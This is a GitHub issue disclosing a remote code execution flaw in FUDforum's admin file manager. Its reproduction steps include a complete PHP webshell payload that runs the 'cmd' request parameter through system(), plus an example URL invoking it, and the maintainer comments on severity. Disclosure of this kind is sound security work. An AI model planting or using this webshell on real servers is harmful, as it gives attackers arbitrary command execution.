Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Remote code execution with File Administration System feature in Admin Control Panel Site
Affected Version- 3.1.0
Demo installation: https://localhost/FUDforum-3.1.2/
Steps to reproduce the bug: 1 : go to http://localhost/FUDforum-3.1.2/ and login with admin account
2 : go to Admin Control panel and access to http://localhost/FUDforum-3.1.2/adm/admbrowse.php?&SQ=59a844c7073e3a8d98026d324884a119
3 : Use File to upload Feature in File Administration System to Upload PHP Webshell PHP to Webroot Directory WebShell payload:<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
4 : Access to webshell and get remote execution code. Example : http://localhost/FUDforum-3.1.2/2test1.php?cmd=ls%20-la
The text was updated successfully, but these errors were encountered:
Confirm that is Critical impact !
Sorry, something went wrong.
It needs to be fixed, but it's not critical, as it requires admin access.
Agree with u
No branches or pull requests
Remote code execution with File Administration System feature in Admin Control Panel Site
Affected Version- 3.1.0
Demo installation: https://localhost/FUDforum-3.1.2/
Steps to reproduce the bug:
1 : go to http://localhost/FUDforum-3.1.2/ and login with admin account
2 : go to Admin Control panel and access to http://localhost/FUDforum-3.1.2/adm/admbrowse.php?&SQ=59a844c7073e3a8d98026d324884a119

3 : Use File to upload Feature in File Administration System to Upload PHP Webshell PHP to Webroot Directory

WebShell payload:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>4 : Access to webshell and get remote execution code.

Example : http://localhost/FUDforum-3.1.2/2test1.php?cmd=ls%20-la
The text was updated successfully, but these errors were encountered: